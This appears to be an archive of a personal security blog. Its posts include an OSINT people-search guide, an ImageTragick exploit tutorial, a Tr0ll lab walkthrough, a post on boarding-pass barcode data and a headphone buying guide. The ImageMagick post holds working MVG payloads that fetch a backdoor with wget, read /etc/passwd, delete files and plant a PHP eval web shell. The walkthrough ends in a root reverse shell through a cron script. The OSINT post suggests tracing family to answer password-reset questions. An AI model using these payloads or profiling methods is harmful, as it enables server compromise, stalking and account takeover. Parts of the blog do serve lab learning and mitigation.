Friday, 1 July 2016

Foot printing unique guide

Source and credits : irongeek and lynde

General Search:

Google
Duh. Make sure you know your operators to get he most out of it however.
http://www.google.com

Bing
Ok, Bing gets made fun of a lot as an “also ran” next to Google, but it has a few awesome features. Many of the same operators from Google work here, but one I really dig that only Bing has is IP: to find other websites on the same IP (shared host cross referencing fun).
http://www.bing.com/

Networking, Domain and Routing Information


Most of this page will cover finding out information on people from social networks, not network networks. However, sometimes knowing who owns a network/domain/IP is a great place so start, and people leave things in their Whois records that may reveal a lot of useful leads. There are so many sites that offer these types of services, but I’ll only cover my favorites.

RobTex
While the interface is a bit weird in my opinion, this is a great site for doing reverse DNS look-ups on IPs, grabbing Whois contacts, and finding other general information about an IP or domain name.
http://www.robtex.com

ServerSniff
This one is sort of an odd ball. Lots of sites offer Whois info, this one goes for more exotic tools. You really have to just play with it to find all of its features. It’s sometimes hard to remember which option is where. Just some of the tools are: ICMP & TCP traceroutes, SSL Info, DNS reports and Hostnames on a shared IP. It’s nice to have them do some of the recon for you if you don’t want to use a proxy and don’t wish for your IP  to show up in the target’s logs.
http://serversniff.net

Looking for profiles on a person

OSINT BOOKMARKLETS v0.2
http://illmob.org/bookmark.html
Cool page from Will Genovese‏ where you can lookup Phone, IP, Host, Email, S/N, Name, and Address info in an automated fashion.Moose Roots
http://www.mooseroots.com
Awesome site, especially for these sub-sites
http://birth-records.mooseroots.com/
http://marriage-divorce-records.mooseroots.com/
which are great for mapping out family relations for password reset questions.
Advanced Background Checks
For finding street addresses and relatives this is the bomb. So far, it has not failed me on finding street addresses if I have a vague idea where someone lives
http://www.advancedbackgroundchecks.com
Peek You
The interface is clean, and while it links off to pay sites it at least gives you real information first. I seem to recall it being better in the past.
http://www.peekyou.com

Lullar
Search for a person using Email|Name|user name. There are not as many results returned as other sites, but what it gives you is nice an clean, with out all of the paid sites in the way.
http://com.lullar.com/

Check Usernames
Ok, got to say I love this site. It may not have been meant as a site for profiling, but it works well for that task. We all talk about password reuse being a problem, but for profiling someone user name reuse is where it is at. This site lets you search 160 social network sites to see if a screen name is taken. From there, you can go see what is in a persons profile on those sites by hand. Saves some time verses checking for an account on each site yourself, but there is still lots of work for you to do afterwards.  
http://www.checkusernames.com/

KnowEm
Similar to Check Usernames above, but claims to check over 500 sites to see if a given user name is taken.
http://knowem.com

iSearch
This use to be Spock ("Single Point Of Contact (by) Keyword"). Not sure when it changed, my guess is after Intelius bought them. You can search on Name|Phone|Emai|lScreen Name. Good for finding relatives I suppose. Once you find a name from a user name you should step back and search for it as well, as the results vary a lot. Seems to mostly drive people to paying money to Intelius.
http://www.isearch.com

Pipl
You can search for Name|Email|user name|Phone and find related results. The results can be very noisy, with links to a bunch of paid sites (Spokeo, Intellus, etc.),  but if you are willing to sort though the crap it’s pretty nice. I like what it shows from public records, Amazon profiles, and social networks.
http://www.pipl.com

123 People
Much like all of the above. Links off to a bunch of other resources, some paid and some not.
http://www.123people.com

Spokeo
Ok, Spokeo has some nice layout features but it’s an info tease. It reports “hey I found something” a lot, but you have to pay for the results. Much like crime, I don’t pay. Still, it can be nice as a starting point to lead you elsewhere. For example, once you know someone has a Facebook profile, you can just go to Facebook.
http://www.spokeo.com

WebMii
Lets you looks up people by name or keyword (try user name as a keyword).
http://webmii.com/

Zoom Info
Seems pretty good for finding where someone works. I wonder how much of the information is just from LinkedIn, and how much from other sources? Looking at them side by side, Zoom Info does seem to augment the details with other sources.
http://www.zoominfo.com

Geo Location

Android Map
If you have the MAC address of a router (it happens) Samy has a tool to try to geolocate it base on what Google knows. Seems likely that Google is using Android phone to do a distributed wardrive to supplement their street view car data.
http://samy.pl/androidmap

Bing Map Apps
The map apps are a nice extra to have, but you will need SilverLight and they don’t seem stable unless you are using Internet Explorer (go figure). Look at the Twitter map app.
http://www.bing.com/maps/

Twitter Map
Also nice to see where people are tweeting from, but not as slick or as comprehensive as the Bing app.
http://twittermap.appspot.com/


Other Oddities

411
I've had good luck with using this to find addresses and neighbors.
http://www.411.com/
Google Images
I imagine most folks know about Google Images, but did you know who can upload images (or drag and drop them) to find similar results? Good for finding profiles under different names. Tin Eye is similar, but does not seem to cover as much.
http://images.google.com/
Tin Eye
Ever found a picture of someone, and wondered if it existed elsewhere? Tin Eye, and it’s browser plugin, let you choose a picture and find similar ones online, even ones that have been seriously shopped. Unfortunately, the database seems small. My hope would be to go to a social network profile, right click on an image I only know the user name of, then find other profiles with a real name and better information. So far, it’s mostly been useful for finding out “who is this actor/model”, but perhaps in the future it will be better.
http://tineye.com

Open Book
Got to love people that leave Facebook comments open to the world. Even if one person is privacy aware, a friend of theirs may not be and could make comments about them.
http://youropenbook.org/

Open Status Search
Open Book seems to be gone, and Open Status Search seems to be the next best thing.
http://openstatussearch.com/

Pic Fog
May find something good, may find something that scars you for life.
http://picfog.com

White Pages Find Neighbors
Might be useful if you need to SE someone close by.
http://www.whitepages.com/find_neighbors
Yasni
I've had some pretty good luck using this to scrape info on people.
http://www.yasni.com

Archive.org Wayback Machine
Sometimes someone drops their docs, but removes them. The Wayback Machine may help you find the deleted info.

http://www.archive.org/web/web.php

Board Reader
Maybe the person posts on some forums with a given user name? Could lead to useful info.
http://boardreader.com

OMGili
Another board search, like the above.
http://omgili.com

Tools

Ok, these are not websites, but damn useful tools that pull from web resources.

Maltego
Nifty tool, and I like the way it draws connections between entities like name, domain, email addresses, etc., good for building a mind map of how things are related. I still prefer to do things by hand to clear up false positives and interpret data. You will likely have to register for API keys to get the most use out of it.
http://www.paterva.com

NetGlub
This could someday be an open source replacement for Maltego, but right now it seems next to impossible to get working.
http://www.netglub.org/

Foca
I really dig this tools. It can do searches for common document formats using Google and other search engines, then download them to extract metadata. Lovely.
http://www.informatica64.com/DownloadFOCA/

Cree.py
Great tool for geolocating/tracking Twitter/Foursquare users. Not only pulls coordinates from the posts directly, but can grab them from the EXIF data in pictures they link to.
http://ilektrojohn.github.com/creepy/


Sites I’ve found so useless...
... that I won’t even link to them, but I want to keep people from asking “why isn’t X listed?” Mostly you get on this list for having little to no free information, and only leading to questionable for pay information.

zabasearch
yoname (use to like it, now the results seem pretty bad)
wink
mylife
freeality
infospace

Tuesday, 17 May 2016

Image Magick Exploit Tutorial

Hi friends,

Its been a long time since i blogged so came up with  a topic of image magick exploit.

Here is the information which i decided to blog about :

What is image Magick ?


ImageMagick is a popular software used to convert, edit and manipulate images. It has libraries for all common programming languages, including PHP, Python, Ruby and many others. It is also very simple to use, which lead it to be used by many developers when in need of image cropping or manipulation.
However, the latest versions of ImageMagick doesn’t properly filter the file names that get passed to the internal delegates that handle external protocols (like HTTPS). This allows an attacker to execute his own commands remotely by uploading an image. This leads to a full RCE (remote command execution) vulnerability in your image uploader. The vulnerability is so serious that researchers created a fun nick name for it which is easier to remember than just CVE-2016-3714: ImageTragick.

Vulnerability Details

Since the initial partial disclosure of this vulnerability our research team has been 100% focused on trying to create a workable proof of concept to understand the exploit and test our own protections against it. After many hours and some great help from the security community, we were able understand the vulnerability enough to create a simple PHP upload tool that uses ImageMagick, and the exploit to compromise it (hat tip to Cosmin, one our developers that help the research team there).
The vulnerability is very simple to exploit, an attacker only needs a image uploader tool that leverages ImageMagick. During our research we found many popular web applications and SaaS products vulnerable to it (people love gravatars), and we have been contacting them privately to get things patched. Unfortunately, even with all the media attention, not everyone is aware of this issue.
Going into a bit more details, this vulnerability can actually be divided in 4 different issues (or maybe 5, depending on who you ask), that is very well explained by Karim Valiev from the Mail.Ru Security Team here. So summarize, this is what we have to be aware:
  1. Remote command execution on .mvg/.svg file uploads. By proving a malicious file, an attacker can force a shell command to be executed on the server. This is a very simple example being shared lately:
    image Over 0,0 1,1 'url(https:";wget "http://pastebin.com/raw/badpastebin" -O /home/vhosts/file/backdoor.pl")'
    When that gets added to a MVG file, the wget command is executed and the output of the pastebin file saved on backdoor.pl.
  2. Remote file deletion. When using the “ephemeral:/” protocol, an attacker can remove files on the server
  3. Remote file moving: Similar to the file deletion issue, but when using the “msl:/” pseudo protocol, the attacker can move files around
  4. File content disclosure when using the “label:@” protocol.
When combining all these issues, the attackers have a wide range of options and tools to compromise a web application that leverages ImageMagick. Note that only filtering for MGV extension is not enough, as any file format will be inspected and the command executed.
I suspect a lot more vulnerabilities within ImageMagick will be found soon as more researchers are looking at it.
Also note that the latest signatures set for ModSecurity and others IDS tools do not detect or block this issue. We updated our WAF last night to virtually patch this vulnerability, users behind the Sucuri Firewall are now protected. We also went back looking for previous attacks and we didn’t see any in the wild, yet. That will likely change soon as attackers build their own exploits.

Protection

Users behind our WAF are already protected against this vulnerability, but we still recommend everyone to follow the ImageMagick developers recommendation and edit the /etc/ImageMagick/policy.xml file and disable the processing of MVG, HTTPS, EPHEMERAL, and MSL commands within image files. In the section, add the following lines:
<policymap>
...
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>"
If you can not make those changes, I recommend disabling the image upload functionality for now until you can properly patch. Better safe than sorry.



Now how to exploit it :

Purpose

This is a very simple exploit that was made public on May 4, 2016. It's a code injection vulnerability, caused by software that takes user input and uses it to construct a command line.

What You Need

  • A Kali 2 machine, real or virtual

Task 1: Proof of Concept (5 pts.)

Checking ImageMagick Version

This bug has been patched, so if you have recently updated, your version may not be vulnerable. To check your version, in a Kali Terminal window, execute this command:
convert -version
When I did it, my version was "ImageMagick 6.8.9-9", as shown below. This version is vulnerable. If you see a different version number, check the Sources at the bottom of this project to see if it's vulnerable.

Creating the Exploit File

In a Kali Terminal window, execute this command:
nano exploit.mvg
In nano, enter the code shown below. Notice the mismatched single-quotes and double-quotes and the https URL that won't resolve. The vulnerability is in the https processor, and the payload of this exploit is the "ls -la" at the end.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|ls "-la)'
pop graphic-context

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:
convert exploit.mvg out.png
The "ls -la" command executes, listing the files in your working directory, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown in the image above:
  • A convert command followed by a filename ending in .mvg
  • A file listing showing the same filename ending in .mvg with a Date
Save a whole-desktop image, using a filename of "Proj X19a from YOUR NAME".

Task 2: Mitigation (5 pts.)

This mitigation prevents the exploits by disabling the vulnerable ImageMagick coders. In a Kali Terminal window, execute this command:
nano /etc/ImageMagick-6/policy.xml
Scroll down to find the policymap section, as shown below.
Place your cursor under the <policymap> line and press the Enter key a few times to make some room, as shown below.

Insert the lines shown below in the blank region you just created.

  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:
convert exploit.mvg out.png
The "ls -la" command does not execute. Instead, you see a "convert: not authorized" message, as shown below.

Saving the Screen Image

Make sure you can see the "convert: not authorized" message, as shown in the image above. Save a whole-desktop image, using a filename of "Proj X19b from YOUR NAME".

Task 3: Listening Shell (10 pts.)

First, undo the Mitigation above, so your ImageMagick is vulnerable again. Then create a malicious file named shell.mvg that opens a listening backdoor shell. You may find this document helpful

Some additional image magicks explolit's :


ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.

Here are some useful trick to complement the fill 'url()' vulnerability
described by @CrazedSec.

@air


== 1 ==

It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension.  You can change it to .png, .jpg, or anything
else.

If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.


== 2 ==

You can use a similar technique to delete a file, provided ImageMagick is built
with support for it's ephemeral protocol:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context


== 3 ==

You can move files around, provided you're able to determine the location of
uploaded files.  This can be used to upload new files as well as overwrite
existing files.

first_image.png:

<?xml version="1.0" encoding="UTF-8"?>
<image>
    <read filename="/var/www/uploads/second_image.png"/>
    <write filename="/var/www/hi.php"/>
</image>


second_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context


third_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context 
 
 
 
 
Hope its usefull 

Monday, 21 March 2016

GOOGLE BUG : Anyone can be added into google hall of fame

Hi

I recently discovered one interesting bug at google ,anyone can be added to google hall of fame..

Dont you believe it,yes its real


Bug reproducing steps :

1)sigin into gmail
2)Goto https://bughunter.withgoogle.com/
3)Create profile

4) Note : As per google's link only valid bugs will qualify and you would be listed at hall of fame based upon the bugs which u created

5)Now after creating profile click on hall of fame


within minutes of time you would be listed at "Google Hall of Fame"



BuG Timeline :

FEb 29,2016 : Bug sent to google

Mar 1,2016 : Forwarded to internal team

Mar 10,2016 : Google Team denied its not a bug

Mar 10,2016: Requested public Disclosure

Mar 10,2016 : disclosed publicly

Monday, 29 February 2016

Information disclosure & Source code disclosure by Google

Yep,You read it right

Friday google bug bounty page got collapsed and it revealed the source code location of google

While i was trying to create a google vulnerability researcher profile i thought to check for validations,while i was checked for some basic level validations,the page got crashed and revealed its source code








The above image was the proof for which the information was disclosed.Google immediately patched this issue


Vulnerablity TImeline :

Bug found on google : Friday Feb 26,2016
Bug Patched by google : Friday Feb 27,2016
Requested for disclosure

Closure of bug and the bug filed as duplicate : Feb 29,2016

Although i found the bug ,its sad that someone filed before me,The real credits goes to the reporters who reported the bug first.

Saturday, 28 November 2015

Troll Pentest Lab walkthrough

Code name: tr0ll
Webpage: http://overflowsecurity.com/?p=70
VM download: http://download.vulnhub.com/tr0ll/Tr0ll.rar
Challange: hack your way into the system and get root
First of all and just after booting our victim’s box, we start by searching tr0ll on the network.
# netdiscover
1
As our victim VM is running under VirtualBox, we can find its ip easily, we just have to look at the MAC Vendor, it will be CADMUS COMPUTER SYSTEMS.
Now we got our victim’s IP we will use nmap to scan for open ports and interesting information
# nmap -Pn -A -p- 192.168.11.8
2
Nice, ports 21, 22 and 80 open. And according to the output of nmap, there’s an ftp server running on port 21 with anonymous login enabled!
# ftp 192.168.11.8
3
We successfully logged into the ftp server, and after checking our permissions, the only thing we can do here is downloading the lol.pcap file
# get lol.pcap
lol.pcap looks like a wireshark capture file. Let’s use wireshark see what’s inside
5
The capture file seems to be a “conversation” between an ftp client and an ftp server. But if we look it closely we can see an interesting file out there, secret_stuff.txt. As we just saw that file doesn’t seem to be inside the ftp server right now. We can use wireshark to read it’s content
6
“we almost found the sup3rs3cr3tdirlol”
Well, let’s keep that and go scan our next service. Next step will be looking inside the web server. We start by just browsing it
7
Nothing more than the expected, no sensitive information found. We will use nikto to look for hidden directories
# nikto -h http://192.168.11.8
8
After running the scan we found the “/secret/” dir. And if we browse it..
9
Nothing new… just more trolling. N0w’s when the thinkin’ begins. After few minutes I reminded the sup3rs3cr3tdirlol… and when I looked at that dir in the browser
10
Nice, that’s actually a directory on the web server. That directory contains a file, we will download it.
11
After a few tries, we realized that the file is an executable. If we run that executable we can get a memory address. Following the same logic we used with the sup3rs3cr3tdirlol, let’s put it in the browser one more time.
12
Nice, now let’s look inside that directories
13
The first seems to contain a list of users and the second a password. We can try to perform a dictionary based attack against ftp and ssh services on our target marchine.
After few minutes banging my head against the wall, I realized  that the ssh username was “overflow” and its password was “Pass.txt”(trolled again). So we can log into the system with these credentials.
14
Nice, we are in. Now we can look for suid files or weaknesses in kernel
16
But after about 2 minutes inside…
15
Uh.. something or someone killed our connection. What could it be? After a quick analysis we can see that it happens every 2 minutes. Every 2 minutes? Can it be a cron task?? Let’s see
17
We can’t actually see or edit crontab but we can read /var/log/cronlog and that will give some interesting info
18
Nice, cron is running a python script called cleaner every 2 minutes. We can use the find command to search for that file
# find / -name ‘cleaner.py’ 2>/dev/null
19
Now let’s read the file
20
What that file does is delete all the content in /tmp everytime it’s called.
21
But that’s executed by the user root! Thinking the same? That could be a great way of doing our privilege escalation!
For the next trick we will need to start our netcat listener on port 9988
22
Then and after editing our “perl-reverse-shell.pl” we will download it in the /tmp dir on the target machine
23
And finally, we will edit cleaner.py like this:
24
Now every 2 minutes, our victim will send a root shell to 9988 on our box B-). We can go to the fridge, grab a beer and wait for a shell
25

Wednesday, 7 October 2015

Don’t throw away your old Boarding Pass, it may contain personal information

 Did you have habit of throwing your boarding pass?read it

After finishing your trip, the boarding pass becomes useless, but does that mean that you should throw it in the garbage? Certainly not.
Have you ever thought about what information is contained inside a barcode? No ?
The popular investigator Brian Krebs has published an interesting post on the topic explaining that a Boarding Pass Barcode contains a lot of data.
Airlines use the boarding pass barcode for every single boarding pass, but what happen if someone tries to read the information it contains?
Krebs reported the attempt made by one of its readers, named Cory, who saw a friend posting his boarding pass on Facebook so decided to analyze it.
boarding pass barcode 2
“I found a website that could decode the data and instantly had lots of info about his trip,” said Cory,  “Besides his name, frequent flyer number and other [personally identifiable information], I was able to get his record locator (a.k.a. “record key” for the Lufthansa flight he was taking that day,” “I then proceeded to Lufthansa’s website and using his last name (which was encoded in the barcode) and the record locator was able to get access to his entire account. Not only could I see this one flight, but I could see ANY future flights that were booked to his frequent flyer number from the Star Alliance.”
It’s frightening what someone could do with this information, I used the barcode reader website myself to read an old boarding pass barcode, and the information I could get.
The boarding pass barcodes are widely available for years, the International Air Transport Association (IATA) published a details document  on how the barcode standards have been implemented by the organizations on the industry.
Coming back to Cory’s story, he was able to use the info available in the barcode to enter in Lufthansa website site and access his friend’s phone number, the name of the person who did the booking, and see future flights connected to the frequent flyer account.
What do you think about the possibility to conduct a targeted attack with this data? For example an attacker can send a spear phishing email to the victim reporting information on his flights.
The situation goes worse if we consider that accessing the list of future flights he is able to cancel them or change seats.
An attacker could also reset the PIN number associated with Star Alliance frequent flyer account, in the case of Cory, he tried to use the “Forgot Pin” reset and his friend question was, “What is your Mother’s maiden name?” An information like this, it’s not that difficult to extract and probably can be found in social media.
This is just an example of what can be done with a barcode, and the amount of information it can be extracted. Often people consider that the information revealed is harmless, but its because they don’t think like an criminal.
“Interested in learning what’s in your boarding pass barcode? Take a picture of the barcode with your phone, and upload it to this siteThis blog on the same topic from several years back includes some helpful hints on how to decode the various information fields that get dumped by the barcode reader.” States Brian Krebs.
My advice to our dear reader are:
  • Do not leave your old boarding pass in the airplane
  • Avoid putting the boarding pass in the garbage in one piece
  • Don’t publish the boarding pass in social media

What’s contained in a boarding pass barcode?

Anyone who has flown within the past few years would have seen the now ubiquitous barcode on the boarding pass that’s scanned upon boarding the aircraft.
Over the years I have seen many people post images of these boarding passes online, often while reviewing new technologies such as mobile or web check-in. In most cases any personally identifiable plain-text information has been obfuscated yet the barcode has been left intact.
Eventually curiosity got the better of me and I decided to find out more information on the barcode standard, and the information contained within them.

History of the barcode

In 2005 the IATA (International Air Transport Association) commenced a five year project to deploy Bar Coded Boarding Passes (BCBP) across its member airlines to eliminate magnetic boarding passes. This change would allow airlines to use cheaper boarding pass stock, and even enable technologies such as web and mobile check-in – an advancement estimated to save the industry US$1.5bn annually.

What information do they contain?

When writing this article I sat out collecting various boarding pass barcodes both from my own archived web check-in and other boarding passes found on the Internet.
Using freely available software utilities, I decoded the barcodes and had a look to see what’s there. Here’s an example from a Qantas flight of mine taken last month (decoded from the barcode on the web check-in document):
That information translates to:
  • M1: Format code ‘M’ and 1 leg on the boarding pass.
  • EWING/SHAUN MR: My name.
  • 1A11A1: My booking reference.
  • BNESYDQF: Flying from BNE (Brisbane) to SYD (Sydney) on QF (Qantas).
  • 551: Flight number 551.
  • 107: The Julian date. In this case 107 is April 17.
  • Y: Cabin – Economy in this case. Others including F (First) and J (Business).
  • 26J: My seat.
  • 37: My sequence number. In this case I was the 37th person to check-in.
  • 00: Field size of airline specific data message. 00 as there isn’t any.
In this instance, Qantas are using the minimum data fields as required by the IATA BCBP standard, but what about other boarding pass types?
The next step was to try a real boarding pass issued at the airport.
There’s more information in this boarding pass barcode, which is as follows:
  • M1: Format code ‘M’ and 1 leg on the boarding pass.
  • EWING/SHAUN: My name.
  • E1AAAAA: Electronic ticket indicator and my booking reference.
  • SYDBNEQF: Flying from SYD (Sydney) to BNE (Brisbane) on QF (Qantas).
  • 0524: Flight number 524.
  • 106: The Julian date. In this case 106 is April 16.
  • Y: Cabin – Economy in this case. Others including F (First) and J (Business).
  • 23A: My seat.
  • 0073: My sequence number. In this case I was the 73rd person to check-in.
  • 3: My “passenger status”.
  • 59: There is a various size field. This is the size
  • >: Beginning of the version number
  • 2: The version number.
  • 18: Field size of another variable field.
  • 0: My check-in source.
  • B: Airline designator of boarding pass issuer.
  • 2: Another variable size field.
  • 9: Airline code.
  • 0: International document verification. ’0′ as I presume is not applicable.
  • QF: The airline my frequent flyer account is with.
  • 1245678: My frequent flyer number.
  • 128: Airline specific data.
After this I checked an iPhone boarding pass. This contains the same information as on an airport issued boarding pass.

What could you do?

Most of the information contained within the boarding pass is fairly mundane, and the main point to this exercise is – if you’re going to post an image of your boarding pass online and obfuscate your name – also obfuscate the barcode.
The booking reference is however contained within the barcode and someone could use that to manipulate your booking (if you have more flights to go).

Who is Eddy Chiu?

Qantas have an example web boarding pass on their web site for “FYSH/WILLIAM MR” – a name frequently seen on the sample Qantas cards and other literature.
Intriguingly the barcode on this boarding pass doesn’t match up with the details, and instead shows:
While Mr Chiu is on the same flight as on the boarding pass, he is not sitting in the same seat as Mr Fysh yet shares the same sequence number.
I suspect an easter egg or “calling card” from a developer.

Source : securityaffairs,shaun.net

 

Tuesday, 6 October 2015

Headphone checklist : Tech 101

Source : Tech101 ndtv gadgets

Buying headphones can be daunting. Here are some of the commonly used terms you should know.
Whether it's the cheap plastic pair that comes bundled with your smartphone or the big expensive cans with a giant 'b' on the side, we've all used headphones at some point of time. Getting the sound right can make all the difference between a boring bus ride and an emotional journey. But there's more to headphones than what you see.There's a lot of science and engineering that goes into making a pair of headphones sound a particular way. The sound can be tuned in an infinite number of ways, and enjoying the audio experience is more about matching a pair of headphones to the music you're used to listening to, rather than simply picking by brand or looks.
Our guide will help you get a better understanding of what to look for in headphones, and how to make an informed choice when you're actually shopping for a pair. In case you're confused by any of the terms used, jump down to check out our jargon buster. And in the following weeks, we will even help you pick a pair depending upon how much you are looking to spend.
headphones101_main_cc0.jpgTypes of headphones
In-Ears
Also known as IEMs (In-Ear Monitors), in-ear headphones are the smallest and most portable of all the different kinds. Each earbud fits into your ear canal and is powered by small drivers (see below), usually 8-10mm in size. It can be quickly and easily wrapped and stored, which makes it ideal for use when commuting and traveling.
rock_jaw_kommand_filters_headphones101_ndtv.jpg
Pros: Thanks to the small size and light weight, these in-ears are usually comfortable to wear for hours on end.
Cons: Many users do not like the invasive nature of the fit and prefer to use larger on-ear or over-ear headphones.
On-Ears
Also known as supra-aural headphones, on-ears literally sit on your ears, and are therefore much bigger than in-ears. This style of headphones uses larger driver casings, along with a headband that keeps the ear cups in place securely on your ears. Typically, on-ears headsets use 30-40mm drivers.
vmoda_xs_folded_headphones101_ndtv.jpgPros: Typically more comfortable than in-ears for short periods use, can usually be folded up to pack away when not in use.
Cons: Not as portable as in-ears. Since the ear cups sit atop your ears, may not be too comfortable over long hours of use.
Over-Ears
Also known as around-ears and circum-aural headphones, over-ears are the largest and often the most comfortable kind of headphones. Like on-ears, over-ears have large driver casings and a headband, but the ear cups wrap completely around your ears, rather than resting on them. Because of the large size of the casing, the drivers can be much larger at 45mm and above, which allows for a louder and more detailed sound signature.
audio-technica_ath-m50x_headphones101_ndtv.jpgPros: Usually louder and having a more detailed sound signature. It's also the most comfortable kind of headphones, and even offers passive sound-isolation by completely enveloping your ears.
Cons: Usually the least portable, over-ears are more suited for home or office use.
Specialised Headphones
Noise Cancelling
These headphones work on active noise cancelling technology, where certain sounds are drowned out to offer peace and quiet to the listener. Active noise cancelling headphones use small microphones that pick up on outside noise, and produce noise in the opposite frequency, to cancel out the outside sound. The technology does not work with sounds that vary too much, as the microphone cannot quickly pick up and adjust to different frequencies. Instead, noise cancelling headphones are useful in drowning out regular droning sounds, such as airplane engines, factory machinery, air-conditioner hum and other such uniform frequency sounds.
bose_qc25_headphones101.jpgPros: Good for some peace and quiet in factories, airplanes and noisy environments.
Cons: Noise cancelling requires additional power, so charging/batteries will be needed. Additionally, noise-cancelling technology only works with certain kinds of sounds and cannot block out all sound entirely.
Gaming
Gaming headphones are designed to be used when playing video games computers, consoles or portable devices, to enhance the in-game audio experience. Some, such as the Steelseries Siberia Elite Prism, are designed to provide a virtual surround sound experience, while others like the Razer Tiamat provide a true 7.1 channel surround experience. This helps gamers identify the direction of the audio. For example, in first person shooters, a good headset will let you identify which direction the enemy is firing at you from. These headphones are usually tuned to enhance dialogue and sound effects, and also have powerful microphones for multiplayer voice chat.
steelseries_siberia_elite_prism_headphones101_ndtv.jpgPros: Gaming headphones provide for an excellent surround sound effect, and are tuned for picking up direction and detail in the sound.
Cons: Usually not good enough to listen to music, gaming headphones are too specific with regards to their usability.
Wireless
These headphones are free of cords and cables, and can be used comfortably without worrying about cable length and tangling. Wireless headphones usually work on one of three major transmission technologies: radio frequency, infrared and Bluetooth. The first two require a dedicated base unit which connects to the source device and transmits the frequency to the headphones, while the third uses the popular Bluetooth technology and can be paired wirelessly with a wide range of smartphones, tablets and computers. RF headphones usually work over larger distances, while infrared headphones rely on line-of-sight, and Bluetooth has a 30m range limit in most cases.
jabra_sport_pulse_headphones101_ndtv.jpgPros: Better portability and more suitable for outdoor use. Also useful for home use when the source device is placed at a large distance, such as when watching TV or listening to music in the living room.
Cons: Sound quality is usually not as good as wired headphones. Range issues and battery life can also create problems in the sound and listening experience.
These are the main types of headphones you'll be looking at in the market, but if you're confused by some of the jargon you come across in the shops, don't worry. There are a few basic terms you should know about, and you can probably ignore the rest. You'll find most of these mentioned on e-commerce websites, or on the box of the set you're buying.
Headphone Jargon
Drivers
The core components of any headphones, the drivers are used to convert the electrical signal fed to the headphones into an audible sound signal that can be perceived by the human ear. There are various types of drivers used in headphones, including the most commonly used moving coil (dynamic) drivers, balanced armature drivers, planar magnetic drivers and electrostatic drivers, among others. They use different technologies to power the sound, with some technologies offering better, more powerful sound than others. Dynamic drivers are used in all kinds of headphones, balanced armature drivers are general used in in-ear headphones due to the small size, while planar magnetic and electrostatic drivers are the largest and are usually used in built-for-home over-ear headphones.
audeze_lcd_lcd3plugs_headphones101_ndtv.jpgSome headphones, known as hybrids, use a combination of two drivers (most commonly a combination of dynamic and balanced armature drivers). Generally speaking, bigger drivers don't necessarily mean better as there are other factors as well, but they are a contributing factor, particularly for bass. However, it's best to audition headphones before buying, or read reviews to make sure the product is suited to you. Typically, earphones like the ones bundled with your phone will be around 15mm, while over-ear sets will be around 30-50mm.
Closed- and open-back
Headphones can be either closed or open at the back of the driver enclosure. Since a driver fires both into and away from your ear, an open-back headset will allow the sound to escape outside, while a closed-back headset will block the exit of the outward sound. There are pros and cons to both.
Closed-back headphones prevent others from listening to what you're listening to and are therefore more suited for public places as opposed to open-back headphones which leak sound and are perceived as inconsiderate to use in public. However, open-back headphones (like the ones pictured below) have a much more open sound, giving a more comfortable and realistic listening experience, while closed-back headphones sound more 'in-your-head'. Suitability depends on the purpose for which you need the headphones, and auditioning or reading reviews is recommended.
audeze_lcd_both_headphones101_ndtv.jpgFrequency response
The frequency response range of headphones denotes the full range of sonic frequencies that a pair of headphones can achieve. The human ear can only hear frequencies ranging from 20-20,000Hz, so most headphones try to stick to this range. However, some headphones extend the range at both ends in order provide deeper responses. Although these can't be heard, they can be felt to a small extent along with the audible range, and a wider range often allows for better tone, responses and handling in the midrange, lows and highs. Check the frequency range on the box for an indication of how those particular cans will handle frequencies.
Soundstaging and imaging
These terms represent the ability of headphones to create an accurate sonic stage and image within your mind. Good soundstaging and imaging will create the impression of a live performance, where individual elements of the sound are distinct and feel like they are originating from specific locations on the virtual stage. Separation of sonic elements is also a function of imaging, where better separation represents a more realistic, true-to-life sound. This is best judged by listening and keeping your ears open for separation and clarity, so you won't find it on the specifications of the headphones, but you'll often see it mentioned in reviews.
headphones101_main3_cc0.jpgImpedance
In simple terms, headphone impedance represents the amount of power needed to drive a pair of headphones. Low-impedance headphones require less power to drive, and can therefore easily be used with source devices with weaker amplification, such as smartphones, media players, and other portable devices. They are also more susceptible to blowouts, if too much amplification is delivered to them.
High-impedance headphones require dedicated amplifiers or increased amplification to drive, and deliver a more powerful, driven performance as a result. They are less susceptible to blow-outs, as they are designed to handle more amplification. When choosing headphones, it's important to note the impedance and buy according to the source device you intend to use. Look out for the impedance figure on the box, and choose as per your source devices. Impedance of 15Ohms and under is low and easy to drive, while impedance 50Ohms and above may require some amplification for best results. However, most smartphones and media players are designed to be able to drive headphones with impedance as high as 80Ohms, so higher-side impedance may not be a serious issue.
headphones101_main4_cc0.jpgThese are the main "specifications" that manufacturers tout, and all of them have a different impact on the audio you're listening to, as we explain above. When you're buying a headset, apart from the design types, these specifications are some of the important things you should know about.
What are the features that you normally look for in your headsets? Is there any jargon you've come across that doesn't make sense? Let us know via the comments.